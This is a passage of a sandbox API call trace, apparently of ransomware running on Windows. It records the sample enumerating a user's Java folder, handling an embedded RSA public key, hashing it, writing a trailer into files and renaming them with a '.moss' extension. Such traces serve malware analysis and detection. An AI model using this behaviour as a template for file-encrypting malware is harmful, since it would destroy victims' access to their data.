hHeap=0xcd0000) returned 1 [0173.061] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cef0 | out: hHeap=0xcd0000) returned 1 [0173.061] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cef0 [0173.061] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0173.061] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.061] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cef0 | out: hHeap=0xcd0000) returned 1 [0173.061] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cef0 [0173.061] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0173.061] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b4b098 [0173.061] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.062] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0173.062] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cef0 | out: hHeap=0xcd0000) returned 1 [0173.062] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cef0 [0173.062] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0173.062] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.062] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cef0 | out: hHeap=0xcd0000) returned 1 [0173.062] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cef0 [0173.062] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0173.062] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.062] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cef0 | out: hHeap=0xcd0000) returned 1 [0173.062] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cef0 [0173.062] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0173.062] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.062] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cef0 | out: hHeap=0xcd0000) returned 1 [0173.062] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cef0 [0173.062] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0173.062] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.062] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cef0 | out: hHeap=0xcd0000) returned 1 [0173.062] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cef0 [0173.062] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0173.062] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.062] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cef0 | out: hHeap=0xcd0000) returned 1 [0173.062] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cef0 [0173.062] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0173.062] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.062] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cef0 | out: hHeap=0xcd0000) returned 1 [0173.062] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cef0 [0173.062] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0173.062] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.062] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cef0 | out: hHeap=0xcd0000) returned 1 [0173.063] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x90) returned 0x3b4cef0 [0173.063] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\") returned="jre1.7.0_45\\" [0173.063] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\") returned="Java\\" [0173.063] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\") returned="Sun\\" [0173.063] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0173.063] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0173.063] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0173.063] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0173.063] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0173.063] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0173.063] PathFindFileNameW (pszPath="") returned="" [0173.063] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x68cb4a40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x68d26e60, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68d26e60, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0173.064] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cef0 | out: hHeap=0xcd0000) returned 1 [0173.064] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x68cb4a40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x68d26e60, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68d26e60, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0173.064] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x68cb4a40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68d26e60, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x182ac2a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Data1.cab", cAlternateFileName="")) returned 1 [0173.064] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\Data1.cab") returned=".cab" [0173.064] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\Data1.cab" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\jre1.7.0_45\\data1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0173.067] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=25340970) returned 1 [0173.067] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0173.071] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x182ac04, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0173.071] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0173.074] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x25805, lpOverlapped=0x0) returned 1 [0173.077] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0173.077] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2f1c8) returned 1 [0173.078] CryptCreateHash (in: hProv=0xd2f1c8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0173.078] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0173.078] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0173.078] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0173.078] GetLastError () returned 0x0 [0173.078] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0173.078] CryptReleaseContext (hProv=0xd2f1c8, dwFlags=0x0) returned 1 [0173.079] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0173.079] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0173.079] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0173.079] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0173.079] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0173.080] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0173.081] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x182ac2a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0173.081] WriteFile (in: hFile=0x664, lpBuffer=0x35deb08*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x35deb08*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0173.081] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35deb08 | out: hHeap=0xcd0000) returned 1 [0173.081] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\Data1.cab" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\jre1.7.0_45\\data1.cab"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\Data1.cab.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\jre1.7.0_45\\data1.cab.moss")) returned 1 [0173.082] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44498 | out: hHeap=0xcd0000) returned 1 [0173.082] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0173.082] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0173.084] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdba388 | out: hHeap=0xcd0000) returned 1 [0173.084] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x68d26e60, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x68d26e60, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68d26e60, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0xdd600, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jre1.7.0_45.msi", cAlternateFileName="JRE170~1.MSI")) returned 1 [0173.084] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\jre1.7.0_45.msi") returned=".msi" [0173.084] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\jre1.7.0_45.msi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\jre1.7.0_45\\jre1.7.0_45.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0173.085] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=906752) returned 1 [0173.085] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0173.089] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0xdd5da, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0173.089] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0173.090] SetFilePointer (in: hFile=0x664, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0173.090] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x25805, lpOverlapped=0x0) returned 1 [0173.094] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0173.094] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0173.094] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0173.094] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0173.094] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2f1c8) returned 1 [0173.095] CryptCreateHash (in: hProv=0xd2f1c8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0173.095] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0173.095] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0173.095] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0173.095] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0173.095] GetLastError () returned 0x0 [0173.096] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0173.096] CryptReleaseContext (hProv=0xd2f1c8, dwFlags=0x0) returned 1 [0173.096] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0173.096] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0173.096] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0173.096] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0173.096] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0173.096] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0173.096] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0173.096] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x25810) returned 0x3b62d40 [0173.097] SetFilePointer (in: hFile=0x664, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0173.097] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b88 | out: hHeap=0xcd0000) returned 1 [0173.097] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f0) returned 0x3b39e58 [0173.097] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0173.097] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f0) returned 0x3b48820 [0173.097] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x58) returned 0x3613610 [0173.097] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b57c30 [0173.097] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4e850 [0173.097] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b57c78 [0173.097] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4e868 [0173.097] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4e898 [0173.097] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4ddb8 [0173.097] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4e8b0 [0173.098] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x24) returned 0x35f9e20 [0173.098] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x158) returned 0x3b51ec0 [0173.098] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0173.098] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b48a18 [0173.098] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4e898 | out: hHeap=0xcd0000) returned 1 [0173.098] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4e8b0 | out: hHeap=0xcd0000) returned 1 [0173.098] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4ddb8 | out: hHeap=0xcd0000) returned 1 [0173.098] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f9e20 | out: hHeap=0xcd0000) returned 1 [0173.098] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48a18 | out: hHeap=0xcd0000) returned 1 [0173.098] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4ddb8 [0173.098] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd290 [0173.098] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x3b4e8b0 [0173.098] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x18) returned 0x35e0a70 [0173.098] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x9) returned 0x3b4e898 [0173.098] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd2c0 [0173.098] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10e) returned 0x3aa2588 [0173.098] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0173.098] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x58) returned 0x36136d0 [0173.098] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e06d0 [0173.098] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x104) returned 0x3aa27b8 [0173.098] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e0a50 [0173.098] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2a0 [0173.098] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa2588 | out: hHeap=0xcd0000) returned 1 [0173.098] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4e8b0 | out: hHeap=0xcd0000) returned 1 [0173.098] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2c0 | out: hHeap=0xcd0000) returned 1 [0173.099] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4e898 | out: hHeap=0xcd0000) returned 1 [0173.099] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a70 | out: hHeap=0xcd0000) returned 1 [0173.099] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd290 | out: hHeap=0xcd0000) returned 1 [0173.099] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4ddb8 | out: hHeap=0xcd0000) returned 1 [0173.099] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0173.099] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3613610 | out: hHeap=0xcd0000) returned 1 [0173.099] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b5ed58 | out: hHeap=0xcd0000) returned 1 [0173.099] GetCurrentThreadId () returned 0x324 [0173.099] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0x35deb08 [0173.099] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x82) returned 0x3b54d60 [0173.099] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x2c) returned 0x3608a70 [0173.099] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2f1c8 [0173.099] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x148) returned 0x35ceae8 [0173.099] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd290 [0173.099] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2c0 [0173.099] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xd23a00 [0173.099] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0173.099] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0173.099] GetCurrentThreadId () returned 0x324 [0173.099] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0173.099] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0173.099] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xeb) returned 0x35f7c30 [0173.099] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0173.099] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, 